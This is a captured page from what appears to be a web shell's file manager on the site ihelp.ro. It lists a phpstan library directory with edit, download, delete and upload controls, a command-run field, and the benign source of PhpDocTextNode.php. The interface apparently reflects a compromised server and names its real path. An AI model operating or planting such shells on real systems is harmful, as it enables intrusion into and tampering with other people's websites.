/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
phpstan
/
phpdoc-parser
/
src
/
Ast
/
PhpDoc
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/phpstan/phpdoc-parser/src/Ast/PhpDoc
mkdir
upload
Name
Size
Mode
Actions
Doctrine/
-
0755
rm
AssertTagMethodValueNode.php
1120
0644
edit
dl
rm
AssertTagPropertyValueNode.php
1130
0644
edit
dl
rm
AssertTagValueNode.php
1014
0644
edit
dl
rm
DeprecatedTagValueNode.php
462
0644
edit
dl
rm
ExtendsTagValueNode.php
619
0644
edit
dl
rm
GenericTagValueNode.php
404
0644
edit
dl
rm
ImplementsTagValueNode.php
622
0644
edit
dl
rm
InvalidTagValueNode.php
1175
0644
edit
dl
rm
MethodTagValueNode.php
1590
0644
edit
dl
rm
MethodTagValueParameterNode.php
1231
0644
edit
dl
rm
MixinTagValueNode.php
596
0644
edit
dl
rm
ParamOutTagValueNode.php
730
0644
edit
dl
rm
ParamTagValueNode.php
1041
0644
edit
dl
rm
PhpDocChildNode.php
158
0644
edit
dl
rm
PhpDocNode.php
8440
0644
edit
dl
rm
PhpDocTagNode.php
679
0644
edit
dl
rm
PhpDocTagValueNode.php
161
0644
edit
dl
rm
PhpDocTextNode.php
376
0644
edit
dl
rm
PropertyTagValueNode.php
726
0644
edit
dl
rm
ReturnTagValueNode.php
597
0644
edit
dl
rm
SelfOutTagValueNode.php
600
0644
edit
dl
rm
TemplateTagValueNode.php
931
0644
edit
dl
rm
ThrowsTagValueNode.php
597
0644
edit
dl
rm
TypeAliasImportTagValueNode.php
852
0644
edit
dl
rm
TypeAliasTagValueNode.php
555
0644
edit
dl
rm
TypelessParamTagValueNode.php
914
0644
edit
dl
rm
UsesTagValueNode.php
616
0644
edit
dl
rm
VarTagValueNode.php
745
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/phpstan/phpdoc-parser/src/Ast/PhpDoc/PhpDocTextNode.php
(376B)
<?php declare(strict_types = 1); namespace PHPStan\PhpDocParser\Ast\PhpDoc; use PHPStan\PhpDocParser\Ast\NodeAttributes; class PhpDocTextNode implements PhpDocChildNode { use NodeAttributes; /** @var string */ public $text; public function __construct(string $text) { $this->text = $text; } public function __toString(): string { return $this->text; } }
Save
cmd:
run